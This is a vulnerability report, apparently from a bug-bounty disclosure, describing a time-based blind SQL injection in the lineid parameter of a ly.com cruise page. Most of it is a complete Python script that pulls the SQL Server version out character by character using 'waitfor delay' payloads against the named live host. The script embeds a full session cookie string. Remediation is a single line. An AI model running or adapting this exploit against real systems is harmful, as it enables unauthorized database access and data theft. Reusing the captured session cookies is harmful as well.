A SQL blind injection vulnerability exists in the main site of Tongcheng Network (with verification script)
SQL blind injection on the same main site
Http://www.ly.com/youlun/CruiseTours/CruiseToursAjax.aspx? The lineid parameter of Type = GetToursLineContent & iid = 0.7168335842458044 & lineid = 70855 has SQL blind injection.
Time parameters need to be adjusted in case of instability
#-*-coding:utf-8-*-import httplibimport timeimport stringimport sysimport randomimport urllibheaders = { 'Cookie': 'Hm_lvt_f97c1b2277f4163d4974e7b5c8aa1e96=1421055383,1421056354,1421135352,1421135572; Hm_lvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581413; SearchNew=%25E5%25A4%25A7%25E7%2590%2586%2526%25E5%258C%2597%25E4%25BA%25AC%25262015-02-02%2526%2526%2526; BIGipServerdj-ly-com-pool=3422687404.20480.0000; ASP.NET_SessionId=3pahjdtqnqdjxj3rmrvr25y4; route=e7880858d53355284a6c3af0a94e1de3; BIGipServertengine-api-pool=3775271084.20480.0000; Hm_lpvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581784; BIGipServerly-zhuanti=469962924.8963.0000; BIGipServerly-huochepiao=2986479788.8707.0000; BIGipServerly-huochepiao-resource=3489861804.8451.0000; BIGipServerly-huochepiao-search=2197950636.8451.0000; BIGipServerly-news-lvs=1376129196.20480.0000; BIGipServerly-lvs=1376129196.20480.0000; BIGipServerly-youlun=4194439340.8963.0000; 17uCNRefId=-1; TicketSEInfo=RefId=0&SEFrom=&SEKeyWords=; CNSEInfo=RefId=0&SEFrom=&SEKeyWords=&RefUrl=; __tctmc=144323752.95750554; __tctmd=144323752.88932893; __tctmu=144323752.0.0; __tctmz=144323752.1422589270801.7.6.utmccn=(referral)|utmcsr=http:|utmcct=show/5|utmcmd=referral; longKey=1422588589273300; KOInfo=KOId=0; COMSEInfo=RefId=1308721&SEFrom=&SEKeyWords=&RefUrl=; passport_login_state=pageurl=http%3a%2f%2fgo.ly.com%2fyouji%2f1774354.html; Hm_lpvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422589021; __tctma=144323752.1420797897384185.1420797897683.1422580182505.1422588301145.7; MAIF=||; MAIH=24489,24489,24489,77415,77415,135,24489,24489,24489; searchHistory=%E5%8C%97%E4%BA%AC,53,0,2015-01-13,2015-01-14; ABTest_115=657#1#42952259; MAIQZ=131; MAIHL=201448,201448,70855; __tctmb=144323752.2935134128776432.1422589508896.1422589539854.20; whichIndex=13; twoIndex=5; Hm_lvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422588841; Hm_lvt_0f71f0877229e4e6503de92a28cbf166=1422589516; Hm_lpvt_0f71f0877229e4e6503de92a28cbf166=1422589546', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',}payloads = list(string.ascii_lowercase)payloads += list(string.ascii_uppercase)for i in range(0,10): payloads.append(str(i))payloads += ['@','_', '.', '-', '\\', ' ']print 'Try to retrive SQL Server Version:'user = ''for i in range(1,30,1): for payload in payloads: timeout_count = 0 try: conn = httplib.HTTPConnection('www.ly.com', timeout=4) random.seed() #area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload)) #print i #print ord(payload) #headers['Cookie'] = "area=" + urllib.quote(area) url="/youlun/CruiseTours/CruiseToursAjax.aspx?Type=GetToursLineContent&lineid=70855"+"'if%28ascii%28substring%28%40%40version%2c"+str(i)+"%2c1%29%29="+str(ord(payload))+"%29waitfor%20delay'0%3a0%3a5'--" #print url #time.sleep(0.1) start_time = time.time() conn.request(method='GET', url=url, headers = headers) conn.getresponse() conn.close() print '.', except Exception as e: #print e timeout_count += 1 if(timeout_count==1): user += payload print '[In Progress]', user breakprint '\n[Done], SQL Server version is', user
Solution:
Filter parameters